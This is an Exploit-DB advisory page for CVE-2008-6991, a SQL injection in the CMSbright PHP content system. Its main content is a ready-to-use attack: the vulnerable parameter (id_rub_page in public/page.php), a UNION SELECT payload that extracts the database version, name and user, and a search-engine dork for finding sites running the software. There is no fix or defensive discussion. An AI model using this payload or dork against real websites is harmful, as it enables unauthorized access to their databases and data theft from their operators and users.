CMSbright id_rub_page Remote SQL Injection Vulnerability

2008-09-01T00:00:00
ID EDB-ID:6343
Type exploitdb
Reporter BorN To K!LL
Modified 2008-09-01T00:00:00

Description

CMSbright (id_rub_page) Remote SQL Injection Vulnerability. CVE-2008-6991. Webapps exploit for php platform

                                        
                                            -------------------------------------------
Script  :  CMSbright ..
 
site     :  http://www.cmsbright.com/
 
Author :  BorN To K!LL
 
Dork    :  powered by CMSbright © websens
-------------------------------------------
 
Exploit   :
 
public/page.php?id_rub_page=[SQL]
 
Example :
 
public/page.php?id_rub_page=-9990+union+all+select+concat(version(),database(),user()),2,3,4--
 
-------------------------------------------  
Greets :
 
Dr.2  ,  General C  ,  CcTero0liTi  ,  GolD_M .. & all my friends ..
 
-------------------------------------------

# milw0rm.com [2008-09-01]